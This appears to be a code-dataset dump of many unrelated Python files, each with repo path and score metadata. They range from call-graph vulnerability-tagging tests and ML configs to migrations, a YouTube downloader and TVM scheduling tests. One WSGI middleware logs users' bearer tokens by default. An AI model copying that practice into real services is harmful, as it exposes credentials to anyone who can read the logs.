self.assertIsNotNone(callee_attrs) self.assertTrue('tested' not in callee_attrs) self.assertTrue('defense' not in callee_attrs) self.assertTrue('vulnerable' in callee_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertEqual(callee_attrs['frequency'], 1) # Scenario: main* -- validate+ (cflow) # * Vulnerable # + Designed defense and vulnerable # Arrange source = 'cflow' defenses = [Call('validate', 'utils.c', Environments.C)] vulnerabilities = [ Call('main', 'main.c', Environments.C), Call('validate', 'utils.c', Environments.C) ] caller = Call('main', 'main.c', Environments.C) callee = Call('validate', 'utils.c', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, defenses, vulnerabilities ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNotNone(callee_attrs) self.assertTrue('tested' not in callee_attrs) self.assertTrue('defense' in callee_attrs) self.assertTrue('vulnerable' in callee_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertEqual(callee_attrs['frequency'], 1) # Scenario: main* -- validate+ (cflow) # * Designed defense # + Designed defense and vulnerable # Arrange source = 'cflow' defenses = [ Call('main', 'main.c', Environments.C), Call('validate', 'utils.c', Environments.C) ] vulnerabilities = [ Call('main', 'main.c', Environments.C), Call('validate', 'utils.c', Environments.C) ] caller = Call('main', 'main.c', Environments.C) callee = Call('validate', 'utils.c', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, defenses, vulnerabilities ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' in caller_attrs) self.assertTrue('vulnerable' in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNotNone(callee_attrs) self.assertTrue('tested' not in callee_attrs) self.assertTrue('defense' in callee_attrs) self.assertTrue('vulnerable' in callee_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertEqual(callee_attrs['frequency'], 1) # Scenario: main -- chown (cflow) # Arrange source = 'cflow' caller = Call('main', 'main.c', Environments.C) callee = Call('chown', '', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, list(), list() ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNone(callee_attrs) if __name__ == '__main__': unittest.main()
2.40625
2
output/models/ms_data/regex/regex_test_535_xsd/__init__.py
tefra/xsdata-w3c-tests
1
12789890
from output.models.ms_data.regex.regex_test_535_xsd.regex_test_535 import Doc __all__ = [ "Doc", ]
1.039063
1
kodialect/models/textcnn/configuration_textcnn.py
jinmang2/KoBART-dialect
3
12789891
from transformers.configuration_utils import PretrainedConfig class TextCNNConfig(PretrainedConfig): def __init__( self, vocab_size=30000, embed_dim=300, filter_sizes=[1,2,3,4,5], num_filters=[128]*5, dropout=0.5, num_labels=2, id2label={0:"standard", 1:"dialect"}, label2id={"standard":0, "dialect":1}, bos_token_id=0, eos_token_id=1, pad_token_id=3, **kwargs, ): super().__init__( num_labels=num_labels, id2label=id2label, label2id=label2id, bos_token_id=bos_token_id, eos_token_id=eos_token_id, pad_token_id=pad_token_id, **kwargs, ) self.vocab_size = vocab_size self.embed_dim = embed_dim self.filter_sizes = filter_sizes self.num_filters = num_filters self.dropout = dropout
2.53125
3
com/Leetcode/728.SelfDividingNumbers.py
samkitsheth95/InterviewPrep
0
12789892
<reponame>samkitsheth95/InterviewPrep from typing import List class Solution: def isValid(self, a): theNum = a while a > 0: temp = a % 10 if not temp or theNum % temp: return False a = a // 10 return True def selfDividingNumbers(self, left: int, right: int) -> List[int]: ans = [] for i in range(left, right+1): if self.isValid(i): ans.append(i) return ans sol = Solution() print(sol.selfDividingNumbers(1, 22))
3.875
4
Project/dailyFresh/myDailyFresh/apps/goods/migrations/0002_auto_20210305_1756.py
chaofan-zheng/python_learning_code
0
12789893
# Generated by Django 2.2.17 on 2021-03-05 09:56 from django.db import migrations import tinymce.models class Migration(migrations.Migration): dependencies = [ ('goods', '0001_initial'), ] operations = [ migrations.AlterModelOptions( name='goodstest', options={'verbose_name': '商品', 'verbose_name_plural': '商品'}, ), migrations.AlterField( model_name='goodstest', name='detail', field=tinymce.models.HTMLField(verbose_name='商品详情'), ), ]
1.429688
1
py3odb/cli/command.py
opus49/py3odb
1
12789894
"""Module for abstract Command class to support argument parsing.""" from abc import ABC, abstractmethod from argparse import RawTextHelpFormatter class Command(ABC): """Abstract class that defines a command for argument parsing.""" help_text = None def __init__(self, subparsers): self.subparsers = subparsers self.parser = subparsers.add_parser( self.name, description=self.description, formatter_class=RawTextHelpFormatter ) self.add_arguments() self.parser.set_defaults(command=self.command) @property def name(self): """The name of this command.""" return self.__class__.__name__.replace("Command", "").lower() @property def description(self): """The description to print before help text.""" return "" @abstractmethod def add_arguments(self): """Add the arguments specific to this command.""" self.parser.add_argument("filename", help="The ODB2 filename.") @abstractmethod def command(self, args): """The underlying function that is called when a command is selected."""
3.765625
4
Unit 3 SC/acme_report.py
Tyler9937/DS-Unit-3-Sprint-1-Software-Engineering
0
12789895
# Importing needed library and Product class import random from acme import Product # creating lists of adjectives and nouns adjectives = ['Cool', 'Flavorful', 'Shiny', 'Awsome'] nouns = ['Phone', 'PS4', 'Computer', 'Anvil'] def generate_products(num_products=30): ''' creates a list of products given the num_products input and the adjectives and nouns lists ''' products = [] for i in range(0, num_products): name = adjectives[random.randint(0, len(adjectives)-1)]\ + ' ' + nouns[random.randint(0, len(nouns)-1)] price = random.randint(5, 100) weight = random.randint(5, 100) flammability = random.uniform(0.0, 2.5) products.append(Product(name=name, price=price, weight=weight, flammability=flammability)) return products generate_products() def inventory_report(products): ''' takes a list of products input and outputs a nice summery ''' price_list = [] weight_list = [] flame_list = [] for obj in products: price_list.append(obj.price) weight_list.append(obj.weight) flame_list.append(obj.flammability) average_price = sum(price_list) / len(price_list) average_weight = sum(weight_list) / len(weight_list) average_flame = sum(flame_list) / len(flame_list) print('ACME CORPORATION OFFICIAL INVENTORY REPORT') print('Unique product names: ' + str(len(products))) print('Average price: {}'.format(average_price)) print('Average weight: {}'.format(average_weight)) print('Average flammability: {}'.format(average_flame)) if __name__ == '__main__': inventory_report(generate_products())
3.828125
4
move_1.py
Housebear/python-learning
0
12789896
#!/usr/bin/python3 # -*- coding:utf-8 -*- # File Name: move_1.py # Author: Lipsum # Mail: <EMAIL> # Created Time: 2016-05-11 18:25:12 def move(n, source, bridge, destination): if n == 1: print(source, '-->', destination) else: move(n-1, source, destination, bridge) move(1, source, bridge, destination) move(n-1, bridge, source, destination) num = ('A','B','C') move(3,*num)
3.515625
4
migrations/versions/8fb490efb894_.py
maiorano84/ctaCompanion
2
12789897
"""empty message Revision ID: 8fb490efb894 Revises: <KEY> Create Date: 2020-06-15 20:33:31.609050 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '8fb490efb894' down_revision = '<KEY>' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('boss_base', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=32), nullable=True), sa.Column('nameSafe', sa.String(length=32), nullable=True), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_boss_base_name'), 'boss_base', ['name'], unique=True) op.create_index(op.f('ix_boss_base_nameSafe'), 'boss_base', ['nameSafe'], unique=True) op.create_table('bossteam', sa.Column('id', sa.Integer(), nullable=False), sa.Column('hero', sa.String(length=16), nullable=True), sa.Column('damage', sa.Integer(), nullable=True), sa.Column('user_id', sa.Integer(), nullable=True), sa.Column('bossbase_id', sa.Integer(), nullable=True), sa.ForeignKeyConstraint(['bossbase_id'], ['boss_base.id'], ), sa.ForeignKeyConstraint(['user_id'], ['user.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_bossteam_damage'), 'bossteam', ['damage'], unique=False) op.create_index(op.f('ix_bossteam_hero'), 'bossteam', ['hero'], unique=False) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_index(op.f('ix_bossteam_hero'), table_name='bossteam') op.drop_index(op.f('ix_bossteam_damage'), table_name='bossteam') op.drop_table('bossteam') op.drop_index(op.f('ix_boss_base_nameSafe'), table_name='boss_base') op.drop_index(op.f('ix_boss_base_name'), table_name='boss_base') op.drop_table('boss_base') # ### end Alembic commands ###
1.882813
2
comment_list_brige.py
jonatep/ace-attorney-twitter-bot
0
12789898
class Comment: def __init__(self, tweet): self.author = Author(tweet.user.name) self.body = tweet.full_text if (len(self.body) == 0): self.body = '...' self.score = 0 class Author: def __init__(self, name): self.name = name
3.046875
3
wsgi_microservice_middleware/request_id.py
presalytics/WSGI-Microservice-Middleware
1
12789899
""" Middleware and logging filter to add request ids to logs and forward request Ids in downstream requests """ import logging import re import traceback import datetime import pythonjsonlogger import pythonjsonlogger.jsonlogger import wsgi_microservice_middleware logger = logging.getLogger(__name__) REQUEST_ID_HEADER_NAME = wsgi_microservice_middleware.env.str("REQUEST_ID_HEADER", "X-Request-Id") LOG_TOKENS = wsgi_microservice_middleware.env.bool("LOG_TOKENS", True) def make_wsgi_header_key(header: str): wsgi_header = "HTTP_" + REQUEST_ID_HEADER_NAME.replace("-","_").upper() return wsgi_header class RequestIdMiddleware(object): """ This middleware add access log-style record with a request id and includes the request Id in int he response headers """ def __init__(self, app, header_name: str = None): self.header_name = header_name if not self.header_name: self.header_name = REQUEST_ID_HEADER_NAME self.wsgi_header_key = make_wsgi_header_key(self.header_name) self.app = app def __call__(self, environ, start_response): def custom_start_response(status, headers, exc_info=None): # append whatever headers you need here FACTS = [ environ.get("HTTP_HOST", ""), environ.get("REQUEST_METHOD", ""), environ.get("RAW_URI", ""), environ.get("SERVER_PROTOCOL", ""), status ] message = " | ".join(FACTS) request_id = environ.get(self.wsgi_header_key, '""') extra = {"request_id": request_id} token = None if LOG_TOKENS: try: auth_header = environ.get("HTTP_AUTHORIZATION", None) token = re.sub(r"\W", "", auth_header.lstrip("Bearer")) if token: extra.update({"token": token}) except Exception: # No exception log, requst missing token pass adpater = logging.LoggerAdapter(logger, extra=extra) adpater.info(message) headers.append((self.header_name, request_id,)) return start_response(status, headers, exc_info) return self.app(environ, custom_start_response) def current_request_id(): """ Retrives the current request id from the wsgi `environ` buried in the call stack """ _req = None wsgi_header = "HTTP_" + REQUEST_ID_HEADER_NAME.replace("-","_").upper() try: for frame in traceback.walk_stack(None): if getattr(frame[0], 'f_globals', None) and getattr(frame[0], 'f_locals', None): if frame[0].f_globals.get('__name__', None) == __name__ and 'environ' in frame[0].f_locals: environ = frame[0].f_locals['environ'] _req = environ.get(wsgi_header, None) break except Exception: pass return _req class RequestIdFilter(logging.Filter): """ Logger filter to add a `{request_id}` logger variable tot he logging context """ def __init__(self, header_name=REQUEST_ID_HEADER_NAME, *args, **kwargs): self.header_name = header_name self.wsgi_header_key = "HTTP_" + self.header_name.replace("-","_").upper() super().__init__(*args, **kwargs) def filter(self, record): record.request_id = self.get_current_request_id() return True def get_current_request_id(self): _req = current_request_id() if _req: request_id = _req else: request_id = "" return request_id class RequestIdJsonLogFormatter(pythonjsonlogger.jsonlogger.JsonFormatter): def add_fields(self, log_record, record, message_dict): super(RequestIdJsonLogFormatter, self).add_fields(log_record, record, message_dict) if not log_record.get('timestamp'): # this doesn't use record.created, so it is slightly off now = datetime.datetime.utcnow().astimezone(tz=datetime.timezone.utc).isoformat() log_record['timestamp'] = now if log_record.get('level'): log_record['level'] = log_record['level'].upper() else: log_record['level'] = record.levelname if not log_record.get('name'): log_record['name'] = record.name if not log_record.get('threadName'): log_record['threadName'] = record.threadName
2.703125
3
devops/__init__.py
crazypenguin/devops
300
12789900
<gh_stars>100-1000 from __future__ import absolute_import, unicode_literals from .celery import app as celery_app # from .job import scheduler # 第一个获取到文件锁的进程执行任务后,如果在运行中途进程关闭重新启动了一个新的,则依然会多次执行 __all__ = ['celery_app'] # __all__ = ['celery_app', 'scheduler'] # import pymysql # pymysql.install_as_MySQLdb()
1.203125
1
helloworld.py
CptShock/AuroraModules
0
12789901
<gh_stars>0 import willie @willie.module.commands('helloworld') def helloworld(bot, trigger): bot.say('Hello World!')
1.828125
2
rattube.py
wormholesepiol/RatTube
3
12789902
# rattube.py # # Copyright 2020 <NAME> <<EMAIL>> # from termcolor import cprint from pyfiglet import figlet_format from pytube import YouTube import time from os import system, name import sys from colorama import init init(strip=not sys.stdout.isatty()) class RatTube: def limpiar_Pantalla(self): if name == "nt": _ = system('cls') else: _ = system('clear') ''' Con este método comprobamos si la plataforma es NT (Windows) o si es Linux. Según el retorno boleano que se obtenga del método, ejecuta la instrucción usada en dicha plataforma para limpiar la consola''' def mostrar_Banner(self): cprint(figlet_format('RatTube', font='banner3'), 'yellow', 'on_blue', attrs=['bold']) '''Imprime el banner que se muestra en pantalla. el método cprint recibe parámetros texto,color del texto y fondo que tendrá el texto, attrs hace referencia a la fuente que sería en negrita el texto que recibe el método cprint es lo que se obtiene de formatearlo con el método figlet_format que lo convierte en ascii art y nos permite elegir fuentes que contiene la biblioteca pyfiglet''' def limpiar_Mostrar_Banner(self): self.limpiar_Pantalla() self.mostrar_Banner() '''Este método limpia la pantalla y muestra el banner. Se usa llamando los dos métodos juntos porque en la mayoría de los llamados se necesita que el banner siga ejecutándose manteniendo la pantalla limpia para dar enfoque a la tarea de descarga''' def confirmar_Descargar(self): url = input('\n\nIngresa la URL del video: ') ruta = input('\nEn qué ruta de tu equipo guardarás el archivo\n(si no pones una ruta, se guardará en el directorio del script)? ') yt = YouTube(url, on_progress_callback=self.progress_function) print("\n", yt.title) global video video = yt.streams.first() size1 = str(round(video.filesize / (1024 * 1024))) print("\nTamaño del video: ", size1, " MB aprox.") video.download(ruta) tecla = input("\nPresione cualquier tecla para terminar") time.sleep(3) print("\n\nAdiós") '''Este método hace uso de la biblioteca pytube,de la clase Youtube y sus métodos. Permite realizar la descarga del video, pideo una url y la ruta de guardado por defecto se guarda en la carpeta donde esté el script''' def progress_function(stream, chunk, file_handle, bytes_remaining): print(round((1-bytes_remaining/video.filesize)*100,3), '% done...') def descargar(self): self.limpiar_Mostrar_Banner() print("""\n\n1. Ingresar URL del video 2. Volver""") opcion = input("\nElija una opción: ") if opcion == "1": self.confirmar_Descargar() else: self.limpiar_Mostrar_Banner() self.mostrar_Menu(self.descargar, self.salir) '''Este método es para confirmar que si deseamos introducir la url del video. Si no nos hemos equivocado, confirmaremos que pondremos la url, en caso que no podremos dar en volver, ejecutando el método limpiar_Mostrar_Banner y llamando al menú inicial nuevamente''' def salir(self): self.limpiar_Pantalla() sys.exit() '''Si elegimos salir en el menu, se ejecuta este método. Nos permite terminar la ejecución del script sin interrumpir con el teclado''' def mostrar_Menu(self, descargar, salir): print("""\n1. Descargar video de Youtube 2. Salir""") choice = input("\nElija un opción: ") opciones = {"1": self.descargar, "2": self.salir} if choice == "1": eleccion = opciones[choice]() while choice not in opciones: print("\nNo se reconoce la opción") time.sleep(5) self.limpiar_Mostrar_Banner() self.mostrar_Menu(self.descargar, self.salir) else: eleccion = opciones[choice]() '''Muestra el menú inicial. Llama desde aquí a los métodos necesarios para ejecutar las acciones de descarga o de salida del script''' rata = RatTube() rata.limpiar_Pantalla() rata.mostrar_Banner() rata.mostrar_Menu(rata.descargar, rata.salir)
2.59375
3
django-api/rasaApp/urls.py
raghavwadhwa/RasaReactBOT
0
12789903
from rest_framework import routers from .api import * from . import api from django.urls import path urlpatterns = [ path('translate/', api.TranslateViewSet.as_view(), name='translate'), path('response/', api.ResponseViewSet.as_view(), name='response'), ]
1.5625
2
src/ipdasite.theme/src/ipdasite/theme/tests/test_viewlets.py
NASA-PDS/planetarydata.org
0
12789904
# encoding: utf-8 # Copyright 2012 California Institute of Technology. ALL RIGHTS # RESERVED. U.S. Government Sponsorship acknowledged. from ipdasite.theme.testing import IPDA_SITE_THEME_INTEGRATION_TESTING from Products.Five.browser import BrowserView as View from zope.component import getMultiAdapter from zope.viewlet.interfaces import IViewlet, IViewletManager import unittest2 as unittest class ViewletTest(unittest.TestCase): layer = IPDA_SITE_THEME_INTEGRATION_TESTING def setUp(self): self.context = self.layer['portal'] self.request = self.layer['app'].REQUEST self.view = View(self.context, self.request) def testViewletInterfaces(self): '''Ensure viewlet classes implement proper interfaces''' from ipdasite.theme.browser.agencies import AgenciesViewlet self.failUnless(IViewlet.implementedBy(AgenciesViewlet)) def test_suite(): return unittest.defaultTestLoader.loadTestsFromName(__name__) if __name__ == '__main__': unittest.main(defaultTest='test_suite')
1.90625
2
test/test_user_reset_password_requests_api.py
Apteco/apteco-api
2
12789905
# coding: utf-8 """ Apteco API An API to allow access to Apteco Marketing Suite resources # noqa: E501 The version of the OpenAPI document: v2 Contact: <EMAIL> Generated by: https://openapi-generator.tech """ from __future__ import absolute_import import unittest import apteco_api from apteco_api.api.user_reset_password_requests_api import UserResetPasswordRequestsApi # noqa: E501 from apteco_api.rest import ApiException class TestUserResetPasswordRequestsApi(unittest.TestCase): """UserResetPasswordRequestsApi unit test stubs""" def setUp(self): self.api = apteco_api.api.user_reset_password_requests_api.UserResetPasswordRequestsApi() # noqa: E501 def tearDown(self): pass def test_user_reset_password_requests_confirm_reset_password_request(self): """Test case for user_reset_password_requests_confirm_reset_password_request Confirms a given reset password request and changes the password # noqa: E501 """ pass def test_user_reset_password_requests_create_reset_password_request(self): """Test case for user_reset_password_requests_create_reset_password_request Creates a new reset password requests, which will check that the provided email address exists and then issue a confirmation notification # noqa: E501 """ pass def test_user_reset_password_requests_get_reset_password_request(self): """Test case for user_reset_password_requests_get_reset_password_request Requires OrbitAdmin: Returns details for a given reset password request # noqa: E501 """ pass def test_user_reset_password_requests_get_reset_password_requests(self): """Test case for user_reset_password_requests_get_reset_password_requests Requires OrbitAdmin: Returns all the current reset password requests in the system. # noqa: E501 """ pass if __name__ == '__main__': unittest.main()
2.34375
2
objects_new/Sources_new.py
diogo1790team/inphinity_DM
1
12789906
<reponame>diogo1790team/inphinity_DM # -*- coding: utf-8 -*- """ Created on Wed Sep 27 15:31:49 2017 @author: <NAME> """ from SQL_obj_new.Source_sql_new import _Source_sql_new class Source(object): """ This class treat the Sources object has it exists in SOURCES table database By default, all FK are in the lasts positions in the parameters declaration The sources are, e.g. Aitana,Grég, Xavier,... les sources sont les gens qui nous ont fournit les données (Aitana, Grég, Xavier,...) """ def __init__(self, id_source = -1, designation = ""): """ Constructor of the Source object. All the parameters have a default value :param id_source: id of the source - -1 if unknown :param designation: designation of the source :type id_source: int - not required :type designation: text - required """ self.id_source = id_source self.designation = designation def get_all_Sources(self): """ return an array with all the Sources in the database :return: array of sources :rtype: array(Source) """ listOfSources = [] sqlObj = _Source_sql_new() results = sqlObj.select_all_sources_all_attributes() for element in results: listOfSources.append(Source(element[0], element[1])) return listOfSources def __str__(self): """ Ovewrite of the str method """ message_str = "ID: {0:d} Name: {1}".format(self.id_source, self.designation) return message_str
2.5625
3
tests/python/unittest/test_tir_schedule_reorder.py
mozga-intel/tvm
2
12789907
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=missing-function-docstring,missing-module-docstring import sys import pytest import tvm from tvm import tir from tvm.script import ty from tvm.tir.schedule.testing import verify_trace_roundtrip # pylint: disable=no-member,invalid-name,unused-variable @tvm.script.tir def elementwise(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_not_affine(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for i, j, k, l in tir.grid(128, 128, 128, 8): with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) tir.bind(vl, l * 16) B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_dependent_loop(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for i in tir.serial(0, 128): for j, k, l in tir.grid(128, i, 128): with tir.block([128, 128, i, 128], "B") as [vi, vj, vk, vl]: B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_predicate(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for i, j, k, l in tir.grid(128, 128, 128, 128): with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: tir.where(i * 2097152 + j * 16384 + k * 128 + l < 100) B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_non_single_branch(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128)) C = tir.alloc_buffer((128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128)) for i, j in tir.grid(128, 128): for k in tir.serial(0, 128): with tir.block([128, 128, 128], "C") as [vi, vj, vk]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) C[vi, vj, vk] = A[vi, vj, vk] * 2.0 for k in tir.serial(0, 128): with tir.block([128, 128, 128], "B") as [vi, vj, vk]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) B[vi, vj, vk] = C[vi, vj, vk] * 2.0 @tvm.script.tir def elementwise_with_loops_not_same_scope(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128)) for i, j in tir.grid(128, 128): with tir.block([128, 128], "A") as [vi, vj]: tir.bind(vi, i) tir.bind(vj, j) for k in tir.serial(0, 128): with tir.block([128], "B") as [vk]: tir.bind(vk, k) tir.reads([A[vi, vj, vk]]) tir.writes([B[vi, vj, vk]]) B[vi, vj, vk] = A[vi, vj, vk] * 2.0 @tvm.script.tir def elementwise_with_wrong_block_var_type(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128)) for i, j, k in tir.grid(128, 128, 128): with tir.block([128, 128, tir.scan_axis(0, 128)], "B") as [vi, vj, vk]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) tir.reads([A[vi, vj, vk]]) tir.writes([B[vi, vj, vk]]) B[vi, vj, vk] = A[vi, vj, vk] * 2.0 @tvm.script.tir def elementwise_reordered(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for l, j, k, i in tir.grid(128, 128, 128, 128): with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) tir.bind(vl, l) B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_reordered2(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for k, j, i, l in tir.grid(128, 128, 128, 128): with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) tir.bind(vl, l) B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_reordered_with_predicate(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for l, j, k, i in tir.grid(128, 128, 128, 128): with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: tir.where(i * 2097152 + j * 16384 + k * 128 + l < 100) tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) tir.bind(vl, l) B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def opaque_access(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, [16, 16], "float32") B = tir.match_buffer(b, [16, 16], "float32") with tir.block([16, 16], "A") as [vi, vj]: tir.reads([]) tir.writes([A[0:16, 0:16]]) tir.store(A.data, vi * 16 + vj, 1) with tir.block([16, 16], "B") as [vi, vj]: tir.reads([]) tir.writes([B[0:16, 0:16]]) tir.evaluate(tir.tvm_fill_fragment(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype="handle")) @tvm.script.tir def opaque_access_reorder(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, [16, 16], "float32") B = tir.match_buffer(b, [16, 16], "float32") for j, i in tir.grid(16, 16): with tir.block([16, 16], "A") as [vi, vj]: tir.bind(vi, i) tir.bind(vj, j) tir.reads([]) tir.writes([A[0:16, 0:16]]) tir.store(A.data, vi * 16 + vj, 1) for j, i in tir.grid(16, 16): with tir.block([16, 16], "B") as [vi, vj]: tir.bind(vi, i) tir.bind(vj, j) tir.reads([]) tir.writes([B[0:16, 0:16]]) tir.evaluate(tir.tvm_fill_fragment(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype="handle")) # pylint: enable=no-member,invalid-name,unused-variable def test_reorder(): sch = tir.Schedule(elementwise, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) sch.reorder(l, i) tvm.ir.assert_structural_equal(elementwise_reordered, sch.mod["main"]) verify_trace_roundtrip(sch=sch, mod=elementwise) def test_reorder2(): sch = tir.Schedule(elementwise, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) sch.reorder(k, i, l) tvm.ir.assert_structural_equal(elementwise_reordered2, sch.mod["main"]) verify_trace_roundtrip(sch=sch, mod=elementwise) def test_reorder_with_opaque_access(): sch = tir.Schedule(opaque_access, debug_mask="all") block_a = sch.get_block("A") i, j = sch.get_loops(block_a) sch.reorder(j, i) block_b = sch.get_block("B") i, j = sch.get_loops(block_b) sch.reorder(j, i) tvm.ir.assert_structural_equal(opaque_access_reorder, sch.mod["main"]) verify_trace_roundtrip(sch=sch, mod=opaque_access) def test_reorder_with_predicate(): sch = tir.Schedule(elementwise_predicate, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) sch.reorder(l, i) tvm.ir.assert_structural_equal(elementwise_reordered_with_predicate, sch.mod["main"]) verify_trace_roundtrip(sch=sch, mod=elementwise_predicate) def test_reorder_fail_with_multi_appearance_loops(): sch = tir.Schedule(elementwise, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(k, i, i) def test_reorder_fail_with_non_single_branch_loop(): sch = tir.Schedule(elementwise_non_single_branch, debug_mask="all") block_b = sch.get_block("B") i, j, k = sch.get_loops(block_b) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(k, i) sch = tir.Schedule(elementwise_non_single_branch, debug_mask="all") block_b = sch.get_block("B") block_c = sch.get_block("C") i, j, k1 = sch.get_loops(block_b) _, _, k2 = sch.get_loops(block_c) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(k1, i, k2) def test_reorder_fail_with_loops_not_under_same_scope(): sch = tir.Schedule(elementwise_with_loops_not_same_scope, debug_mask="all") block_b = sch.get_block("B") block_a = sch.get_block("A") i, j = sch.get_loops(block_a) k = sch.get_loops(block_b)[0] with pytest.raises(tvm.tir.ScheduleError): sch.reorder(k, i) def test_reorder_fail_with_wrong_block_var_type(): sch = tir.Schedule(elementwise_with_wrong_block_var_type, debug_mask="all") block_b = sch.get_block("B") i, j, k = sch.get_loops(block_b) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(k, i) def test_reorder_fail_with_dependent_loops(): sch = tir.Schedule(elementwise_dependent_loop, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(l, i) def test_reorder_fail_not_affine_bindings(): sch = tir.Schedule(elementwise_not_affine, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(l, i) if __name__ == "__main__": sys.exit(pytest.main([__file__] + sys.argv[1:]))
1.84375
2
Pages/MusicPage/Components/Head.py
Th3Wizard001/Amplify
11
12789908
